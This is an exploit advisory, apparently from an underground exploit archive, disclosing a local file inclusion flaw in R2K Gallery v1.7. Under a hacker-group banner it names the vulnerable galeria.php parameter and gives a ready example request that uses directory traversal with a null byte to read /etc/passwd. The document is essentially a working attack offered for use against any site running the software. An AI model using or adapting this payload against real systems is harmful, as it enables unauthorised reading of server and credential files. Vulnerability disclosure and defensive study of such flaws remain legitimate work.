R2K Gallery version 1.7 suffers from a local file inclusion vulnerability.
0a7068900426ba467971565c63d6299b1f552173c2beaa0220df1159a12f1cd6
\\\|///
\\ - - //
( @ @ )
----oOOo--(_)-oOOo---------------------------------------------------
[ Y! Underground Group ]
[ Dj7xpl@yahoo.com ]
[ Dj7xpl.2600.ir ]
----ooooO-----Ooooo--------------------------------------------------
( ) ( )
\ ( ) /
\_) (_/
---------------------------------------------------------------------
[!] Portal : R2K Gallery v1.7
[!] Download : http://usuarios.lycos.es/r2kscripts/
[!] Type : Local File Include Vuln
---------------------------------------------------------------------
---------------------------------------------------------------------
Bug :
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]
Example :
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00
---------------------------------------------------------------------